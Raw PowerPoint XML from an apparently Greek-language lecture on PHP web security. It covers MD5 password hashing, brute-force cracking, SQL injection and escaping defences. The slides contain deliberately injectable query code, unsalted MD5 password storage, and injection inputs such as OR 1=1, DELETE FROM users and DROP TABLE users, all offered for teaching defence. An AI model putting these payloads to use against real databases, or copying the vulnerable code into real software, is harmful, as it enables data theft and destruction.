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7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="295" r:id="rId3"/>
    <p:sldId id="353" r:id="rId4"/>
    <p:sldId id="372" r:id="rId5"/>
    <p:sldId id="373" r:id="rId6"/>
    <p:sldId id="374" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="335" r:id="rId9"/>
    <p:sldId id="336" r:id="rId10"/>
    <p:sldId id="337" r:id="rId11"/>
    <p:sldId id="338" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="347" r:id="rId14"/>
    <p:sldId id="376" r:id="rId15"/>
    <p:sldId id="377" r:id="rId16"/>
    <p:sldId id="379" r:id="rId17"/>
    <p:sldId id="378" r:id="rId18"/>
    <p:sldId id="348" r:id="rId19"/>
    <p:sldId id="349" r:id="rId20"/>
    <p:sldId id="350" r:id="rId21"/>
    <p:sldId id="351" r:id="rId22"/>
    <p:sldId id="352" r:id="rId23"/>
    <p:sldId id="361" r:id="rId24"/>
    <p:sldId id="385" r:id="rId25"/>
    <p:sldId id="383" r:id="rId26"/>
    <p:sldId id="360" r:id="rId27"/>
    <p:sldId id="363" r:id="rId28"/>
    <p:sldId id="362" r:id="rId29"/>
    <p:sldId id="365" r:id="rId30"/>
    <p:sldId id="381" r:id="rId31"/>
    <p:sldId id="384" r:id="rId32"/>
    <p:sldId id="364" r:id="rId33"/>
    <p:sldId id="367" r:id="rId34"/>
    <p:sldId id="366" r:id="rId35"/>
    <p:sldId id="368" r:id="rId36"/>
    <p:sldId id="380" r:id="rId37"/>
    <p:sldId id="355" r:id="rId38"/>
    <p:sldId id="369" r:id="rId39"/>
    <p:sldId id="370" r:id="rId40"/>
    <p:sldId id="371" r:id="rId41"/>
    <p:sldId id="339" r:id="rId42"/>
    <p:sldId id="340" r:id="rId43"/>
    <p:sldId id="342" r:id="rId44"/>
    <p:sldId id="341" r:id="rId45"/>
    <p:sldId id="343" r:id="rId46"/>
    <p:sldId id="344" r:id="rId47"/>
    <p:sldId id="345" r:id="rId48"/>
    <p:sldId id="346" r:id="rId49"/>
    <p:sldId id="382" r:id="rId50"/>
    <p:sldId id="356" r:id="rId51"/>
    <p:sldId id="354" r:id="rId52"/>
    <p:sldId id="387" r:id="rId53"/>
    <p:sldId id="386" r:id="rId54"/>
    <p:sldId id="390" r:id="rId55"/>
    <p:sldId id="388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357" r:id="rId70"/>
    <p:sldId id="404" r:id="rId71"/>
    <p:sldId id="405" r:id="rId72"/>
    <p:sldId id="333" r:id="rId73"/>
    <p:sldId id="332" r:id="rId74"/>
    <p:sldId id="389" r:id="rId75"/>
    <p:sldId id="334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2063" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="-27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1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86B8-41A5-45BF-AE9B-96C920165E62}" type="datetimeFigureOut">
              <a:rPr lang="el-GR" smtClean="0"/>
              <a:t>2011-01-14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C186E-BD72-4EC5-9A2E-D7B3A468EF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630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245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January 14,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January 14,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r.php.net/mysqli" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gr.php.net/pdo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Ασφαλεια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8"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>δεν είναι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1 – 1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>απόδειξη</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>;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l-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν έχει βρεθεί η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>-1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65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Στην πραγματικότητα υπάρχουν καλύτερες συναρτήσεις</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>π</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>.χ. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ha2</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Οι βασικές ιδιότητες είναι οι ίδιες</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μονόδρομη συνάρτηση (δύσκολη η εύρεση της </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>f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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χρησιμοποιείται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" smtClean="0"/>
              <a:t>ακόμη ευρέως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8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λογαριασμού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$user = $_POST[ ‘user’ ];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$password = $_POST[ ‘password’ ];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$password = md5( $password );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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“INSERT INTO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users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SET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$user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’,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= ‘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$password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’;”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Πιστοποίηση με </a:t>
            </a:r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8"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεν γνωρίζει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> τον κωδικό</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Γνωρίζει μόνο το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hash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7584" y="3320988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Χρήστης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583668" y="3825044"/>
            <a:ext cx="0" cy="13321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1680" y="3937120"/>
            <a:ext cx="27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Κωδικός σε απλό κείμενο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7585" y="5157192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Διακομιστής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39753" y="5448772"/>
            <a:ext cx="363976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97706" y="5039888"/>
            <a:ext cx="358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md5( password ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και σύγκριση με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01690" y="5039888"/>
            <a:ext cx="1512168" cy="7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Βάση δεδομένων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Πιστοποίηση με </a:t>
            </a:r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$user = $_POST[ ‘user’ ];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$password = $_POST[ ‘password’ ];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$password = md5( $password );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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sz="2400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“SELECT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FROM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users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WHERE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$user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’,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= ‘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$password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94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Σπάσιμο </a:t>
            </a:r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Πρόβλημα:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δίνεται το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>5d41402abc4b2a76b9719d911017c592</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ποιο είναι το αλφαριθμητικό που έχει αυτό το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάθε «μονόδρομη» συνάρτηση σπάει με δοκιμές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δοκιμάζουμε μήπως</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5( “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” ) = “5d41402abc4b2a76b9719d911017c592”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = “5d41402abc4b2a76b9719d911017c592”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>md5( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“ac” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = “5d41402abc4b2a76b9719d911017c592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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Για κάθε πιθανό αλφαριθμητικό</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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35715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Σπάσιμο </a:t>
            </a:r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Εύκολο να σπάσουν κωδικοί με 6 – 7 χαρακτήρες</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δύο είδη δοκιμών:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute force: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όλα τα πιθανά αλφαριθμητικά</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a, b, c, …,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ac, …, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, bb, …,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aab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Dictionary: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όλες οι λέξεις του λεξικού, πιθανώς και συνδυασμοί</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a, aback, abacus, abase, abash, …, zoology, zoom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παράδειγμα)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549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Ανοιχτό ερώτημα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Υπάρχει α τέτοιο ώστε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>α ) = α;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Ένα αθώο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>ερώτημα...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$password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$user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1;”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063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Υπό κανονικές συνθήκες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name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dionyziz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Εξερεύνηση διάφορων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>προβλημάτων ασφαλείας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κατανόηση των</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t> αρχιτεκτονικών προβλημάτων</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Λύση </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και προστασία</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ανασφαλές ανέβασμα αρχείων</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκτελέσιμα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κωδικοί και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όλα μέσα από παραδείγματα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4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Τι γίνεται όμως αν...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είναι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dio’nyziz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AND password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38598" y="4335205"/>
            <a:ext cx="449429" cy="3913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7944" y="396112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Συντακτικό σφάλμα!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 smtClean="0"/>
              <a:t>Ακόμη χειρότερα...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username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είναι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dio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 OR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1 = 1 OR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name = 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nyziz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 OR 1 = 1 OR name = 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16216" y="5141401"/>
            <a:ext cx="1" cy="5667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472514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Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>υπάρχει συντακτικό σφάλμα!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23762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AND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= 1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endParaRPr lang="en-US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(((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552" y="486916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Αληθές</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιλέγει την </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πρώτη</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> εγγραφή.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9552" y="530120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Συνήθως λογαριασμός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR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3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είναι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dio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’; DELETE FROM users; --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‘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 FROM users; --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LIMIT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91982" y="6377429"/>
            <a:ext cx="468050" cy="2686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81969" y="6461381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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>σχόλιο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7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είναι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dio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’; DROP TABLE users; --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‘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 TABLE users; --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LIMIT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32807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l-GR" dirty="0" smtClean="0"/>
              <a:t>ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μπορεί να επιτρέψει:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αντιγραφή όλων των δεδομένων μας χωρίς να το ξέρουμε</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αλλαγή των δεδομένων μας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαγραφή των δεδομένων μας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπορεί να χρησιμοποιηθεί ως </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πάτημα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> για πλήρη πρόσβαση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. για πρόσβαση σε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>λογαριασμούς</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ανάγνωση κωδικών πρόσβασης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>κλπ.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Αποφυγή όλων των χαρακτήρων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και \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 = $_POST[ ‘username’ ];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$username, “’” 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 !== false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$username,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“\\” ) !== false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$username,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‘”’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)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!== false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die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“You’re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not welcome here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.”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108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γίνεται όμως αν θέλουμε να επιτρέψουμε τους χαρακτήρες ‘, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\   ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν γίνεται να απαγορεύουμε π.χ. την αναζήτηση με εισαγωγικά!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πώς είναι εφικτό να περνάμε τους χαρακτήρες αυτούς </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>χωρίς ιδιαίτερη σημασία</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> στην </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL?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Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> όλων των χαρακτήρων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‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>“  \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR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l-GR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>\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 = $_POST[ ‘username’ ];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$username =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addslashes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350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Αν...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είναι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dio’nyziz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\’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AND password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79912" y="4335205"/>
            <a:ext cx="449429" cy="3913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7944" y="396112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Μέρος το αλφαριθμητικού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r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Είδαμε στο μάθημα δικτύων</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>α δεδομένα στέλνονται ως απλό κείμενο</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πώς προστατεύουμε από το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“sniffing”…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κωδικούς πρόσβασης;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπισκότα με ευαίσθητες πληροφορίες;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπισκότα συνόδου;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121718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mysql_real_escape_string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r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάνει την ίδια δουλειά με την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addslashes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</a:t>
            </a:r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Την προτιμούμε από την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addslashes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dirty="0" smtClean="0"/>
              <a:t>καθώς </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>λαμβάνει υπ’ όψιν το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>της βάσης δεδομένων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" y="1772816"/>
            <a:ext cx="888965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βαθύτερο πρόβλημα;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l-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεδομένα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εντολές </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αναπαρίστανται σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>κοινό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αλφαριθμητικό</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν υπάρχει διαχωρισμός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εντολών</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεδομένων</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> σε επίπεδο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Όλα είναι ένα μεγάλο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>string!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Έτσι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>τα δεδομένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μπορούν να καταλήξουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>να είναι εντολές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
